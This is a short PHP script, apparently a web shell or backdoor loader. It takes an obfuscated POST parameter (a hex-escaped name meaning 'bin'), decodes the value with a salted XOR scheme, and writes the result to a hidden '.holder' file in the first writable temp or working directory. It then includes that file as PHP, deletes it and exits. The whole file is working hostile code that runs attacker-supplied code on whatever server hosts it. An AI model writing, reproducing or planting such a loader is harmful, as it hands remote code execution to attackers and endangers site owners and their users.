<?php

if(array_key_exists("b\x69\x6Ed", $_POST) && !is_null($_POST["b\x69\x6Ed"])){
	$desc = $_POST["b\x69\x6Ed"];
				$desc   =	explode	('.'		, $desc ); 
	$binding 	= '';
            $salt 	= 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS 	= strlen($salt );
            $__len 	= count($desc );
    
            for($l 	= 0; $l < $__len; $l++) {	 $v6 	= $desc[$l];
                $chS 	= ord($salt[$l%  $lenS] );
                $d 	= ((int)$v6 - $chS -($l%  10)) ^ 46;
                $binding .= chr($d );
            }
	$item = array_filter([getcwd(), getenv("TEMP"), getenv("TMP"), "/var/tmp", "/tmp", "/dev/shm", ini_get("upload_tmp_dir"), session_save_path(), sys_get_temp_dir()]);
	$reference = 0;
do {
    $data_chunk = $item[$reference] ?? null;
    if ($reference >= count($item)) break;
    		if (is_dir($data_chunk) && is_writable($data_chunk)) {
    $element = sprintf("%s/.holder", $data_chunk);
    $success = file_put_contents($element, $binding);
if ($success) {
	include $element;
	@unlink($element);
	exit;}
}
    $reference++;
} while (true);
}